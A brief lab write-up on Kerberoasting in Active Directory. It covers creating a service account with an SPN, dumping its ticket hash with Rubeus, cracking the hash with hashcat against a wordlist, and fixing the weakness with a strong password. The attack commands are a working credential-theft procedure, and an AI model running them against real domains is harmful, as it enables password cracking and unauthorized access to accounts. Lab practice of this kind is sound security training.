# Kerberoasting

## Making the Lab

Set up general ad lab.

Add in a new user called SQLService

Open a cmd on the DC and use:

```
setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService
```

You can then verify that the spn can be found:

```
setspn -T <DOMAIN>.local -Q */*
```

## Abuse

Rubeus is simplest way:

```
rubeus.exe kerberoast /simple /nowrap
```

Hashcat to crack the hash:

```
hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
```

## Fixing&#x20;

Could remove SPN from account but would break things.

Real fix is to use a strong password for the service account. This could be changed by:

```
net user SQLService NewPasswordThatShouldBeStrong
```